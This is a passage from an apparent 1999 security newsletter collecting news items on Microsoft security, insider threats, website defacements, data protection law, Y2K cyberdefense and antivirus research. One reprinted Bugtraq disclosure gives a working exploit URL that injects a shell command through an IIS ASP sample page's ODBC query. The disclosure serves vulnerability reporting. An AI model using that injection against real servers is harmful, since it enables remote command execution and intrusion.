kernels," she said, explaining that using different code is merely a shortcut for the development team. "It shouldn't be necessary to reinvent the wheel. They can use the efforts of other groups." But testers assert that the situation affects far more than an isolated dialogue box or two. Justin Jenkins, Webmaster of BetaLabs calls Millennium "Windows 2000 skin over Windows 98, as far as I can tell." It's still quite early in the development process for Millennium, and Hilbert notes that trial versions of Windows 98 contained references to Windows 95. However, developers and hardware partners depend on early releases of operating system software to make long-term product plans, analysts say. www.securityportal.com Security: How big of a chink in Microsoft's armor? BO2K Information Center August 2, 1999 - This past week's news of yet another major security vulnerability with Microsoft's products, this time with the ODBC database driver in Excel 97, has lead SecurityPortal.com to take a look at the big picture, and attempt to understand how big of a security problem Microsoft has. This latest security vulnerability is one of the most frightening to date, as it allows shell commands to be executed by opening a spreadsheet, without any warning whatsoever. The ODBC database driver, installed with Excel 97, supports a wide variety of system calls as part of its middleware approach to integrating applications. Among these APIs is an ability to invoke shell commands. Because this is ODBC, and not a macro, there is no warning imparted to the user. A user could download a spreadsheet, only to find that it has deleted files, made registry entries, or a number of other malicious acts, completely in stealth. Do security problems plague Microsoft because of their size, or are there other reasons? There are plenty of reasons to love or hate Microsoft. If you have owned Microsoft stock for the past several years, you probably love them. If you have tried to compete with them on any front, you probably hate them. Their penchant for consuming any technology or application space is well known, from dominating the word processor market to eating away at Netscape's browser share to attempting to co-opt Java. Microsoft has shown no fear of getting into new businesses and has experienced mixed results, such as with WebTV, City Sidewalk and several others. No doubt, Microsoft plays the role of the 800 pound gorilla to perfection, and they are a magnet for publicity, both good and bad. As Microsoft aggressively pursues new markets and continued dominance in existing markets, are they adequately protecting the backdoor? Microsoft is in the crosshairs of the hackers, that is no doubt. M$, Windoze - these negative nicknames are certainly only there to mock Microsoft, and there do not seem to be equivalent negative terms for other companies. There is a fair amount of validity to Microsoft's claim that Back Orifice 2000, for example, could have been written for other platforms and was mostly written to embarrass Microsoft. However, we believe it is a leap of faith to claim that all of Microsoft's security issues are relative the popularity of their products, and other competing products have the same problems. What are architectural differences between Microsoft operating systems and others? Windows 98 and Windows NT are two completely different operating systems, each with its own heritage. Windows 98 can be traced back almost to the origins of the company itself, as it is an iteration of MS-DOS. Windows 98 is a personal operating system. Its design and capabilities are to act as a single user operating system, with penultimate consideration being given to that one person behind the keyboard. The efforts put into Windows over the years have been to simplify the tasks of that one person, with considerations for the rest of the world being bolted on: network access, file sharing and of course, security. There is no concept of different levels of local system authority, user context versus administrative, file system permissions, etc. It is a completely unsophisticated core operating system that over time has been overlaid with a terrific set of end user features. These are major issues with the Windows 9x operating system that make it wholly unsuited with the security requirements of the connected world. Windows NT owes its existence to the fractured relationship Microsoft and IBM had over OS/2 ten years ago. Microsoft didn't agree with IBM that Windows did not have a future and sought to build its own "OS/2" to compete in the enterprise market. Microsoft wanted it to be a GUI to the core, and although it was influenced by many technologies, notably VMS, it was a brand new operating system. Unlike Windows 9x, it was built to be a multi-user operating system from the beginning. The concepts of a superuser, user, guest, contexts, inherited privileges are all in there. The Local Security Authority of NT authenticates and provides access based upon access control lists that extend to file systems, processes and any other objects defined by the system. In essence, it has a lot of the security features of Unix; it is simply less mature, with more security bugs yet to be exploited. This immaturity often leads to add-on applications not fully taking advantage of the security model and defaulting to additional services being implemented in an insecure manner, often by installation with administrator rights. NT is just as susceptible to application borne viruses as 9x, including programs like Melissa, although a virus that tries to directly access hardware or specific files may be constrained by the user's privileges. While there are stark differences in the foundation and architecture of these two operating systems, there are also security vulnerabilities common to both platforms, caused by other product groups within Microsoft. The effort to create a tight integration of its operating systems with Internet Explorer and Office has not only gotten Microsoft into hot water with the Department of Justice over possible antitrust violations, but has created an integrated security nightmare. Because of this integration, Windows 98 and NT (to a somewhat lesser degree, it depends upon the machine account privileges the user has) are unique among major operating systems in that a malicious hacker can create a program on a web site that can be opened and in one step destroy a computer. Tightly integrating applications with operating systems is bad for security, probably the worst thing Microsoft has done for security. In fact, it could be argued that Windows NT has a fairly good security model, until you start adding Microsoft applications on top of it. Some observations: The Windows 9X product needs to die, and Microsoft will need to be pushed to make this happen. There have been several occasions where the product end of the Windows 9X line has been predicted, even positioned by MS executives as a stepping stone to NT. Yet it has outlived even many internal projections within Microsoft, for the simple reason being that it is a cash cow. The momentum behind its huge legacy created a product that has by far outsold NT with lower development costs. How do you financially justify shutting something like that off? This is something that has been argued long and hard internally within Microsoft, to the point that you would probably be safer sharing a cab with an NT and Linux developer, than with an NT and Win98 developer. CIOs need to keep in mind that much of the future threats to their infrastructure will come from within, and there is no really safe place to use Windows 9x. If you need to run Windows, you need to run NT. Microsoft needs to make secure computing the cornerstone of the company, and the foundation of every product and service offering. For the end user right now, Microsoft practices "Are you sure?" security: "Are you sure" you want to run this macro, open that file? In fact users are often uncertain if the file they are about to open is going to work as advertise, or is going to wreak havoc on their system. If you look at the Security tab within Internet Explorer, you see different "zones" that you can define settings for: Internet, Intranet, Trusted Sites and Restricted Sites. Even if users could accurate index the world according to these categories, it is very crude and not very useful. Systems need to function under the principle of least privileges, and in a large Intranet for example, there could very definitely be one or two servers with malicious trojans. Microsoft haters need to know MS is not going away, and need to get over it. Industry giants die hard. Bill Gates has liked to tell the story about when he first saw kit microprocessors, he thought IBM was toast. I remember the first 80386 processors being promoted as a mainframe on a chip and again IBM was predicted to be in deep trouble. What people did not realize was that as expensive as the big iron was, the investment in mainframe applications, Cobol code and business processes was infinitely greater. The point here is that Microsoft is not going away. Enterprises with a heavy investment in Microsoft desktops are not going to upgrade to Linux stations with KDE en masse any time soon. Linux, with its heritage as a Unix derivative, and intense scrutiny by a million developers, is a strong competitive threat to the same hardware markets that Microsoft sells its own operating systems. While pushing Linux strongly on the desktop has not been a topic many CIOs have looked at closely, it is growing strongly and in many cases displacing NT in the application and file server market. We at SecurityPortal.com have made it no secret that we predict a rosy future for Linux. It is in fact a real long term threat to Windows, but not Microsoft. It is only a matter of time before Microsoft releases its own Linux distribution. Microsoft is not going anywhere and needs to be part of the security solution. Microsoft needs to be held accountable for the security of their products before they are released as well as after they are in production. There needs to be some independent review of Microsoft's code for security vulnerabilities. We can think of no better way to do this than to join the Open Source initiative and in effect put its software in the public domain. This would be a radical departure for Microsoft, but no other single action in the industry could do so much to improve security. To get back to our original question, Security: How big of a chink in Microsoft's armor? It is a very big problem. The years of focus on user friendliness, leveraging operating system dominance against competitive applications and internal strife has built an insecure house of cards. We need to put the walls back between our applications and operating systems. We need third party auditing and accountability for code, possibly through Open Source initiatives within Microsoft. Most of all, we need every CIO to demand that Microsoft reinvent itself around security, just as it reinvented itself around the Internet a few years ago. @HWA 38.0 THE ENEMY WITHIN ~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 3rd August 1999 on 1:00 pm CET "Companies think if they buy an expensive 'firewall', they are secure because the bad guys are outside. "In reality, the majority of the threat comes from within." Dealing with the fact computer hacking is often an inside job, here are some of the main targets of such an attack. Full story below. AUG 3 1999 Computer hacking often an inside job By LEONG CHAN TEIK THE enemy is within -- that is the harsh reality that many companies have yet to grasp, so say two experts on computer network security. Mr Jeff Moss, 29, director of professional services at Nasdaq-listed Secure Computing Corporation, said yesterday: "Companies think if they buy an expensive 'firewall', they are secure because the bad guys are outside. "In reality, the majority of the threat comes from within." He is a former hacker who now breaks into corporate networks only when employed by owners who want to find out their areas of vulnerability. He told The Straits Times that at a basic level, employees can now easily buy software or download software from the Internet that allows them to read their colleagues' e-mail. "There are many tools to do it for you. You don't need to know a lot of technical stuff." Frequently, that is not going to hurt anyone but there will be occasions when the companies' systems will be under threat. Said Mr Moss, who is conducting a seminar for some 200 government and private-sector IT staff here today: "One guy learnt that he was going to be fired. He had the whole day to really damage the network if he wanted to." A common weakness of networks is that they do not segregate, say, the engineering department from the accounting department. This makes for an open system that is vulnerable to attack from all corners. Mr Colin Smillie, 26, technical manager of Secure Computing, said a favourite target of hackers is other users' passwords. And it is an easy target. Once they have succeeded in getting the passwords, they can access confidential files or send e-mail. He said a solution lies in a pager-like device made by his company which generates passwords for one-time use only. The holder keys in his personal identification number into the device which will then generate the password he has to use the next time he logs onto the network. The network is pre-programmed to accept only that password. On the whole, Mr Moss and Mr Smillie said that companies should pay attention to designing systems that are resistant to an attack from within, which is more costly and complex to do. They have to hire more and brighter administrators. The danger is getting bigger by the day, said Mr Moss, who organises the yearly Def Con conventions in Las Vegas where law enforcement agencies such as the US Federal Bureau of Investigation and corporate America meet hackers from around the world to discuss security issues. "You now have more temporary workers, consultants, contractors and business partners who are there for the day. The trend of more and more people sharing data will continue," he said. @HWA 39.0 DRUNKEN HACKERS ON JERRY SPRINGER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 3rd August 1999 on 3:15 am CET "Drunken hackers: The women who love them and the admins who fear them." Lol, yes the Website of the "Jerry Springer" show got hacked yesterday by "Hacking for Drunks". The story is on Newsbytes, the mirror on Attrition.org http://attrition.org/mirror/attrition/com/www.jerryspringer.com/ Springer Website Hacked! On The Next Jerry Springer! By Bob Woods, Newsbytes CHICAGO, ILLINOIS, U.S.A., 02 Aug 1999, 3:48 PM CST The phrase, "Drunken hackers: The women who love them and the admins who fear them," sounds like it would belong on the "Jerry Springer" show - or at least its accompanying Website. The phrase was indeed on the site, but no one from the show put it there. A three-member group calling itself "Hacking for Drunks" (HFD) apparently cracked the site in recent days, putting up text on the site that sounds as if it were stolen from a promotional TV spot for the show. The site is located at http://www.jerryspringer.com "On the next Jerry Springer... Meet beercan, b33rman, and beerb0ttl3," the hacked page began. "Three young men who have given there (sic) up their lives to alcohol abuse and computer hacking. They have agreed to come on Jerry to tell there story." "These three men... will introduce everyone to their world of liquor, women, and computers," the text at the site went on. "You will meet people whos (sic) lives they have changed, and lives they have ruined. They will tell their tale of how they were draged (sic) into the computer underground, where the only rules... are there (sic) own." "This amazing story of lost innocence will touch you, and keep you wondering what your children are doing on the weekends," the text on the cracked site added. As of 4:00 PM EST, the Springer site had not been restored, Newsbytes notes. Officials from neither the Jerry Springer show nor the company that produces the shockfest, Studios USA, could be immediately reached for comment. Hacking for Drunks also claimed responsibility for the recent cracking of "The Blair Witch Project" Website, at http://www.blairwitch.com . The Blair Witch Project is a movie that gained a large following even before its release across the country, due in large part to Artisan Entertainment's Internet-based marketing of the flick. The message at the Blair Witch site was much simpler: "BOO~!@#$%!... d1d w3 scar3 j00?" The movie - made for $60,000 in the woods of Maryland - racked up $28.5 million this past weekend, in its first weekend of release to 800 theaters. Reported By Newsbytes.com, http://www.newsbytes.com . 15:48 CST Reposted 23:25 CST @HWA 40.0 DATA PROTECTION NOT TO BE IGNORED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 3rd August 1999 on 3:00 am CET A London-based legal firm has warned that organizations should not ignore their legal requirements with regards data protection on the Web. Next to the threat by the EU to take legal action against members who don't implement certain data protection legislations, the firm, Tarlo Lyons, warns for the legal implications of data protection for businesses. Story below http://www.technologypost.com/ecommerce/DAILY/19990802105186419.asp?Section=Main Published on Monday, August 2, 1999 E-COMMERCE Data protection on Web should not be ignored NEWSBYTES Tarlo Lyons, a London-based legal firm that has been intricately involved with many aspects of the British government's information technology (IT) operations and legislation, has warned that organizations should not ignore their legal requirements with regards data protection on the Web. The timely warning comes as the European Union (EU) has threatened legal action against nine EU member countries for failing to implement its new data protection legislation. According to the EU press office in Brussels, warning letters have now been sent to government ministers in France, Luxembourg, the Netherlands, Germany, Ireland, the UK, Denmark, Spain, and Austria. The legislation, which became law on a pan-European basis in October of last year, goes beyond existing single country laws in many EU member states in giving citizens very broad rights as to how their personal data is storied by companies. Back in London, meanwhile, Andrew Rigby, head of e-commerce and digital media with Tarlo Lyons, said that many businesses operating in the EU may be sending personal data overseas - something which breaches Principle 8 of the new Data Protection Act 1998 and the European Union Directive number (95/46/EC) on the protection and free movement of personal information. Despite the fact that many employees are unaware of the legal issues relating to transborder personal data transfers, Tarlo Lyons argues that the use of the Internet may cause breaches of the law. The legal firm says that, because of the use of the Internet as a means of advertising and communication, many global businesses are quite often using it both to collect personal information and to send it to overseas offices. Despite this stark warning, Tarlo Lyons is pragmatic enough to say that, in general terms, exporting data is fine if the receiving country is in the EU territories. Problems, however, can occur in countries outside the EU and where there are no similar laws protecting consumers sending personal information. The law firm singles out the US for clear criticism in this regard, which it says does not have similar laws to those seen in the EC. It warns that, in the absence of reciprocal data protection laws in the importing country, global businesses need to enter into inter- company contracts so as to avoid breaching the law. The bottom line to the increasing use of the Internet for personal data transmissions, the law firm says, is that businesses operating on a global scale cannot afford the adverse publicity of being in breach of something as fundamental as privacy and confidentiality. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 41.0 WIRELESS ENCRYPTION HANDHELDS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Monday 2nd August 1999 on 11:50 pm CET Puma Technology is said to announce this week that it will license Certicom's Secure Sockets Layer (SSL) technology for its Intellisync synchronization products. This will allow users on both Palm and Windows CE handheld devices to be able to use strong data encryption over any wireless network. Full story below. Wireless data encryption due for handhelds By Ephraim Schwartz InfoWorld Electric Posted at 6:25 AM PT, Aug 2, 1999 Handheld devices will get a boost in security this week when Puma Technology announces that it will license Certicom's Secure Sockets Layer (SSL) technology for its Intellisync synchronization products. Corporate users of messaging, calendaring, and contact databases on both Palm and Windows CE handheld devices now will be able to synchronize over any wireless network with so-called strong data encryption. The next version of Intellisync Anywhere, due to ship later this year, will include the Certicom security software. The ability to prevent the interception of data is a step toward adoption of handheld devices in the enterprise, but more is still needed, according to IT consultants and industry analysts. "The lack of security never kept handhelds from being officially supported devices," said Travis Hoxmeir, a consultant at Akila, a Portland, Ore., company that helped the Pacific Gas and Electric Gas Transmission agency to deploy a handheld strategy. "Within IT, security is an important issue, but users just say, 'I want [a handheld]. Security is somebody else's problem, not mine,' " Hoxmeir said. Though the Certicom technology will guard against midair interception of data, a bigger problem for IT is what data employees are putting on their handhelds, according to Ken Dulaney, vice president of mobile computing at the Gartner Group, in San Jose, Calif. The storage of company information on personally owned handheld devices is a serious problem, Dulaney said. "We need something from Puma, like a console, that tracks what corporate data is flowing out to these devices," Dulaney added. Puma Technology Inc., in San Jose, Calif., can be reached at www.pumatech.com. Certicom Corp., in Hayward, Calif., can be reached at www.certicom.com. @HWA 42.0 Y2K TO AID IN CYBERDEFENSE ~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Monday 2nd August 1999 on 11:30 pm CET The Senate last week took its first close look at how the knowledge gained and used to battle the Y2K problem can be used to guard now and in the future against attacks on the nation's infrastructure. In a testimony before the Senate Special Committee on the Y2K Technology Problem, federal experts said experience gained in this field could be used to confront infrastructure protection issues. Read more. http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurity-08-02-99.html AUGUST 2, 1999 Feds say Y2K experience aids in cyberdefense BY DIANE FRANK (diane_frank@fcw.com) The Senate last week took its first close look at how the expertise and systems being developed to deal with the Year 2000 problem can be used now and in the future against intentional attacks on the nation's infrastructure. Testifying before the Senate Special Committee on the Year 2000 Technology Problem, federal experts said experience gained by a special coordination center created to gather and share information on problems caused by the Year 2000 date change could be used to confront infrastructure protection issues. However, the center itself may not be needed beyond next March. "Clearly, there will be much of value that will last beyond the [Year 2000 Information Coordination Center]," said John Koskinen, chairman of the President's Council on Year 2000 Conversion. "This is in effect our first real-time test...and ultimately, it is a great way for all of us to learn from this experience." President Clinton recently officially created the ICC, which will gather and share information on incidents worldwide caused by the Year 2000 date change. That information then will be used by agencies, state and local governments and the private sector for a coordinated response. The Senate committee is considering expanding its mission beyond the Year 2000 problem and its life span beyond Feb. 29 to oversee the information security and critical infrastructure protection efforts at the congressional level. But federal officials involved in infrastructure protection issues told the committee that the structures already are in place in the public and private sectors to handle critical infrastructure protection. The officials added that the ICC's information sharing mechanism and the partnerships created throughout government and industry as part of that sharing will be key when dealing with any incidents in the future when someone brings down a computer system that controls a country's transportation, communication or energy infrastructures. "Our collective efforts on Y2K should provide valuable lessons learned for the continuing activities of the NIPC and the federal lead agencies in dealing with cyber incidents after Y2K," said Michael Vatis, chief of the National Infrastructure Protection Center at the FBI. It is hoped that the experience gained from fixing the Year 2000 bug will cut down on the time it will take to develop future responses and management to critical infrastructure attacks, said John Tritak, director of the Critical Infrastructure Assurance Office. The Defense Department has plenty of experience dealing with cyberprotection issues, but it plans to rely heavily on the structures that are being put in place within the department to support the ICC, said Richard Schaeffer, director of infrastructure and information assurance at the Office of the Assistant Secretary of Defense for Command, Control, Communications and Intelligence. Experts throughout government and industry have started to refer to the Year 2000 problem as the first real test of protecting the critical infrastructure of the United States against computer system failures. Although any problems caused by the Year 2000 date change will be unintentional, focus is turning to the possible effect on the nation's infrastructure if someone deliberately attacked a system in an attempt to bring it down. Committee chairman Sen. Bob Bennett (R-Utah) and vice chairman Sen. Christopher Dodd (D-Conn.) also raised several possibilities for more concrete ways that agencies and industry can contribute, including continuing the ICC in the role of a critical infrastructure protection center, creating a new organization to oversee the coordination and even creating a "government chief information officer," who would be at the level of an assistant to the president. The key to infrastructure protection is how fast the response time is because the longer the response takes, the longer you are vulnerable, said Winn Schwartau, information warfare author and consultant. "We need a fundamental shift in the way we approach security," Schwartau said. "It requires an empowerment much farther down the chain of command." @HWA 43.0 Yet Another ODBC Bugged ASP Sample Page ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@SECURITYFOCUS.COM Received: from out4.ibm.net (165.87.194.239) by lists.securityfocus.com with SMTP; 29 Jul 1999 07:32:23 -0000 Received: from storm (slip-32-101-214-12.ri.br.ibm.net [32.101.214.12]) by out4.ibm.net (8.8.5/8.6.9) with SMTP id HAA116640; Thu, 29 Jul 1999 07:32:18 GMT MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.1 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Message-ID: <002901bed994$7765cca0$0cd66520@storm> Date: Thu, 29 Jul 1999 04:32:05 -0300 Reply-To: "Wanderley J. Abreu Junior" Sender: Bugtraq List From: "Wanderley J. Abreu Junior" Subject: Yet Another ODBC Bugged ASP Sample Page X-To: Microsoft Product Security Response Team To: BUGTRAQ@SECURITYFOCUS.COM Dear Team, Exploiting ODBC Features that come with your sample programs is not a mistery for any of us. So Let me add one more ASP Sample with similar troubles: http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp or yet http://server/AdvWorks/equipment/catalog_type.asp It lets you execute shell comands like the other scripts. It is a Active Server Page so it runs the query as a local user and doesn't need any type of Remote Data Service to access the DSN. It just require the default DSN (advworks) set. The Exploit command line can be for instance : http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c +dir+c:\")| Sorry if this SERIOUS security failure was already reported. Regards, Wanderley Junior @HWA 44.0 New security mailing lists available from Security Focus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ hu Aug 05 1999 Security Focus is now offering 3 new mailing lists. Bugtraq Spanish, Bugtraq Japanese & Security Focus News. Security Focus is now offering 3 new mailing lists. The first two are BUGTRAQ-JP (Japanese) and BUGTRAQ-ES (Spanish). The first one will be moderated by Nobuo Miwa and the second one by Hernan Ochoa . The third is SF-NEWS. Here is the charter of the first two new lists: BUGTRAQ-[JP,ES] is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The mailing list language is [Japanese|Spanish]. The mailing list is an offshoot of the BUGTRAQ mailing list. It was specifically created to allow people not comfortable with the English language that speak [Japanese|Spanish] to have access to the same high-quality information as in BUGTRAQ. If you do feel comfortable understanding English we recommend you instead subscribe to BUGTRAQ. You can do so by sending email to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS BUGTRAQ First-name Last-name The moderator(s) of the list will make sure that any interesting discussion in BUGTRAQ is summarized, translated and posted to this list at least once a week. Similarly any new information covered on this list that has not already been discussed in BUGTRAQ will be translated and forwarded to it by the moderator(s). To see the full charter of each list in its native language visit securityfocus.com and look under Forums. The third new list is SF-NEWS. SF-NEWS is the Security Focus weekly summary mailing list. Of interest to BUGTRAQ readers is the inclusion of a summary list of vulnerabilities posted to BUGTRAQ and elsewhere. So if you are overwhelmed by the traffic in BUGTRAQ this may be the one for you. Other things covered include a summary of incidents reported in the INCIDENTS lists, a summary list of positions being offered or resumes being tendered as posted to the Security Jobs list, results from the weekly polls and Security Focus announcements. To subscribe to any of these lists email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS BUGTRAQ-JP First-name Last-name or SUBS BUGTRAQ-ES First-name Last-name or SUBS SF-NEWS First-name Last-name @HWA 45.0 Beyond Virtual Vaccinations ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.sciencenews.org/sn_arc99/7_31_99/bob2.htm (See url for graphics and charts, omitted from this textfile) Beyond Virtual Vaccinations Developing a digital immune system in bits and bytes By Damaris Christensen The fear of new, dangerous viruses sweeping through an unprotected population is not limited to public health officials. Computer researchers have long worried because typical virus-scanning computer programs—which essentially vaccinate machines against known viruses—become outdated as newly created viruses spread over the Internet. Just as researchers turned to biology in applying the name virus to the pesky programs that could make computers sick, several groups have turned to biology for a new model of how to protect computers against unknown viruses. They are focusing on the human immune system. These computer scientists hope to develop a digital system that, like the immune system, can quickly recognize and fight off known infections, identify new intruders and learn how to deter them, and remember all previously encountered pathogens. Such a system also needs to be safe, reliable, and secure. A computer virus released in March aptly demonstrated the need for more-effective ways of fighting off computer viruses. Although warnings about the Melissa virus went out soon after it was identified, it spread as quickly as the alarms (SN: 5/8/99, p. 303). Within just a few days, the virus had circled the globe, sending countless unwanted E-mail messages across the Internet and clogging E-mail service at hundreds of organizations, forcing them to shut off their Internet connections. Although Melissa—the first virus to mail itself around the world—merely clogged E-mail systems, virus makers have already launched spin-offs of the virus designed to destroy data. The risk of computer infections rises as more information is exchanged through E-mail or over the Internet. Likewise, the potential damage that viruses can create multiplies as people send sensitive personal and corporate data over the Internet. Computer security experts also warn that the avenues for viruses to spread multiply dramatically as computers use software that's integrated so that one program can launch another. "There used to be plenty of time to analyze a virus before it spread, but Internet-borne viruses can spread around the world in hours or days," says Steve R. White of IBM's Thomas J. Watson Research Center in Yorktown Heights, N.Y. "In a world where things can travel this quickly and do this much damage, we have to have automated ways of dealing with them. It is silly to think that we can protect against these viruses manually." Computer viruses got their name from what White calls "an obvious but deep biological analogy." Like biological viruses, the computer versions replicate by attaching themselves to a host (a computer program rather than a human cell) and then co-opting the host's resources to make copies of themselves. Infection can lead to death: The computer crashes and all program information is irretrievably lost. Infection can also lead to sickness when the virus does not destroy any data but spreads and slows programs and communications. Even seemingly innocuous viruses may taint files and make the computer more likely to crash—like a long-lasting, low-grade infection. Companies spend several hundred million dollars annually on antivirus products and services, and they lose even more in downtime when they need to take their systems off-line to prevent viral infections from spreading. Because antivirus programs can only identify the viruses they already know, they aren't effective against the 10 to 15 new viruses created every day. Worst of all, says White, "many users of antivirus software blissfully continue to use antivirus software that is more than a year out of date." Aside from frequent updates, there are few ways of strengthening this system. Some antivirus programs can monitor a computer system for viruslike behavior, such as making a file bigger without adding new data, but such systems are prone to false alarms and virus makers can take steps to evade such detection systems. In the early 1990s, White and his colleagues at IBM dreamed of a digital immune system for computers (SN: 7/23/94, p. 63). For a model, they looked to the human immune system, which is constantly bombarded by infectious agents it has never before encountered and yet to which it generally responds quickly. Computer virus makers often reuse key parts of existing viruses in their new creations, White explains. An immune system should be able to identify previously unrecognized viruses by these short so-called genes, which often are critical to the viruses' function. Although conventional software might contain some of these genelike sequences, the presence of many is typically a sign of viral infection, White says. When a computer participating in a pilot test of this digital immune system finds virus genes or any other signs of infection, it strips out confidential data and encrypts the rest. The altered file then goes to a central computer facility at IBM to be analyzed. A computer there routes the virus to a test machine that lures the virus into replicating by running a variety of programs. If any of these decoy programs become infected, the test computer attempts to pull out a signature that can identify the virus in other computers. The signature and a prescription to strip the virus out of infected files is then sent back to the central computer. It adds the new virus to its database and sends the information on detection and treatment back to the infected computer. IBM's automated process typically takes less than 5 minutes to identify a virus signature and derive a prescription, the developers claim. Uninfected computers will also be "vaccinated," as the IBM team puts it, against infections with this new virus as soon as they check the updated database. Ultimately, White envisions, uninfected computers will be vaccinated automatically. Later this summer, IBM, in conjunction with a leading antivirus-program developer, Symantec Corp. in Cupertino, Calif., plans to release an antivirus plan that includes such a digital immune system. "This is the first step toward a comprehensive system that can spread a global cure for a virus faster than the virus itself can spread," White says. The IBM researchers are still trying to develop ways to mimic another trait of the immune system. An infected cell produces chemicals signaling distress, warning neighbor cells to put up barriers to slow the spread of the virus. Thus, when the immune system develops ways of attacking the intruder, it can quickly outpace the spread of the virus. The biological analogies of computer security may stretch even further than IBM's vision, says Stephanie Forrest of the University of New Mexico in Albuquerque. The human immune system identifies foreign invaders because they don't carry the body's typical flags of "self," not because they resemble other infectious agents. Forrest and her colleagues have found a way for a computer to identify self. By looking at short sequences of signals between a program and the computer's operating system, she and her colleagues have defined patterns unique to each machine. Abnormal patterns may be a sign of infection. For example, a program making unusual demands on system resources has very likely been co-opted by a virus or is being attacked by a hacker, says Forrest. "We've shown pretty convincingly that looking at these short sequences of self gives good discrimination between what is self and what isn't," she says. Such a system can be very efficient, Forrest points out. The protected computer uses its resources to check only programs and files that it is using. She and her colleagues have also shown that information packets flowing into and out of a network of computers hooked to the Internet show patterns recognizable as self or nonself. Like white blood cells in the human body, a digital immune system can create antibodies that recognize foreign material, Forrest says. To minimize the chances that the antivirus program will attack the computer itself, it would always destroy antibodies that flag patterns that are intrinsic to the computer. Using the remaining digital antibodies, the system will periodically check for abnormal patterns that may signify virus infections or intrusions from hackers. Forrest and her colleagues are working on a system that will allow a computer to continually learn to redefine itself, so the computer can accept new programs without flagging them as viruses. The researchers have not yet explored how to attack viruses once identified. Forrest says that a self-recognizing system will be practical even for individual computers connected to the Internet and used primarily for E-mail, writing, designing graphic presentations, and perhaps a little programming. Though still theoretical, Forrest's approach may offer many advantages. A different immune system would run on every computer. Since every computer would create different antibodies, a virus that evaded one computer might not escape detection by another, limiting the spread of the virus. Likewise, a person who broke into one computer network and managed to avoid detection by that system might not be so successful on another network, she says. "They've taken a much more exact analogy with biology by developing digital antibodies," says White. "But the analogy breaks down. All of my cells come from me, so my immune system can define self. But I put files on my computer every day.... This system may be very good for intrusion detection, but it may not be a good approach for viruses, because it will make too many mistakes. Our approach is more specific for viruses." Both research groups caution that in nature, no defense system remains perfect forever. Just as white blood cells and viruses engage in a delicate dance, each evolving to outwit the other, so will computer viruses and antivirus technology, White says. Viruses are getting more dangerous all the time, he says. Several programs for automating the development of macro viruses are circulating, meaning that the virus-writing community can create viruses faster than ever. There are even some indications that viruses may be evolving on their own, White says. For example, some versions of Microsoft Word may make minor errors when copying viruses. These changes may disable the virus, or they may make the virus harder to spot. Also, if two or more viruses successfully infect a computer, one may accidentally copy itself into the other virus, creating a new kind of bug, he says. While uncommon so far, these scenarios are certainly threatening, White notes. Whatever the form of the threat, the goal of protecting computer systems remains. "What we would ideally like is for a computer to behave the way the human body does," says Sushil Jajodia of George Mason University in Fairfax, Va. "When we are attacked by a virus, we get sick, but the immune system detects the virus, defeats it, and heals the damage. Computer systems are not like the human body, though, in that we need to provide the technology." Because programs and operating systems are not usually designed with security in mind, antiviral programs will always be behind the curve, says Jajodia. "It still isn't clear how well this idea [of digital immune systems] will work, but we have no better alternative for detecting virus infections," he says. Computer users have demanded ease of use but not security, says Forrest. "While people are becoming aware of the issues...they don't feel personally threatened yet." She notes that "when the Internet took off in the early '90s, it became evident that the computer-security problem was going to become everybody's problem." Jajodia, editor-in-chief of the Journal of Computer Security, says that programmers should address the problem of viruses long before people begin using newly developed software. Designing computer systems and programs with security in mind is an important first step, he says. More programs should check digital signatures to confirm that transferred files and computer code come from a trusted source. Better encryption systems, which help ensure that information has not been altered in transit from one computer to another, would make it harder for people to design viruses and for viruses to spread, he says. Computer-security experts warn that no single set of changes will be enough to completely protect increasingly interconnected computer systems. They hope, however, that new security measures, such as digital immune systems, will fend off future epidemics. Computer viruses: Then and now The first computer virus, called Brain, appeared in 1987. The people who created the first viruses hitched them to operating systems (such as DOS) or to applications (such as games or editing programs). Some of these viruses are still circulating. With these viruses, when a user turns on an infected computer or runs an infected program, the viral code copies itself into the computer's memory—and from there into any subsequent applications the user runs. These viruses spread only when a computer user shares tainted files and programs with other people. On the other hand, viruses like Melissa latch onto macros, small programs hidden in word processing software. For example, when an unsuspecting recipient of the Melissa virus opened an infected document written in Microsoft Word, the virus activated and hijacked another program known as Microsoft Outlook. This program E-mailed copies of the infected document to the first 50 people listed in the program's address directory. The virus spread so quickly because so many people use both Word and Outlook. Until macros became commonplace, viruses couldn't infect data files, including word processing documents and spreadsheets. Macro viruses proliferate rapidly because many people share data files freely, and they do so primarily through E-mail. Once one data file is infected, a virus can infect all other data files of that application as soon as they are opened. By the end of 1998, programmers and users had identified more than 30,000 viruses. Viruses of all sorts now affect millions of computers every year. From Science News, Vol. 156, No. 5, July 31, 1999, p. 76. Copyright © 1999, Science Service. @HWA 46.0 Forgot your password? Try 'way2many' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.nytimes.com/library/tech/99/08/circuits/articles/05pass.html August 5, 1999 Forgot a Password? Try 'Way2Many' Better Online Security Has Meant More Passwords, and More Frustrated Users By JENNIFER 8. LEE few months ago, Kevin McGuire, a computer consultant in Lombard, Ill., designed a new computer system for a client. After a break from the project, he sat down at the computer to start up the system but couldn't get into the server. 